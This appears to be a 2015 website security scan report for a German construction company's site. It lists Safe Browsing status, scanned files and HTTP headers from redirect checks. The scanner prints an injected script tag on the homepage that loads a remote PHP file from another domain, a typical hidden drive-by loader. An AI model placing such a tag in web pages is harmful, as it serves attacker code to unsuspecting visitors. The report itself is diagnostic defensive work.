Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=salca-bau.de
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://salca-bau.de/ | 200 OK Content-Length: 4557 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://www.rowder.de/mlrxc483.php?id=21501080"></script> | ||
https://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js | 200 OK Content-Length: 91556 Content-Type: text/javascript | clean |
http://salca-bau.de/js/colorbox/jquery.colorbox.js | 200 OK Content-Length: 9760 Content-Type: application/javascript | clean |
http://salca-bau.de/js/nivo-slider/jquery.nivo.slider.js | 200 OK Content-Length: 15853 Content-Type: application/javascript | clean |
http://www.rowder.de/mlrxc483.php?id=21500708 | 200 OK Content-Length: 336 Content-Type: text/html | clean |
http://www.rowder.de/test404page.js | 200 OK Content-Length: 336 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: salca-bau.de
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 13 Jan 2015 05:08:28 GMT
Pragma: no-cache
Server: Apache/2.2.16
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=592d9c9de5d384f345b21d69aefc59d8; path=/
X-Powered-By: PHP/5.3.28-1~nc.1
GET / HTTP/1.1
Host: salca-bau.de
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 13 Jan 2015 05:08:28 GMT
Pragma: no-cache
Server: Apache/2.2.16
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=592d9c9de5d384f345b21d69aefc59d8; path=/
X-Powered-By: PHP/5.3.28-1~nc.1
Second query (visit from search engine):
GET / HTTP/1.1
Host: salca-bau.de
Referer: http://www.google.com/search?q=salca-bau.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: salca-bau.de
Referer: http://www.google.com/search?q=salca-bau.de
Result:
The result is similar to the first query. There are no suspicious redirects found.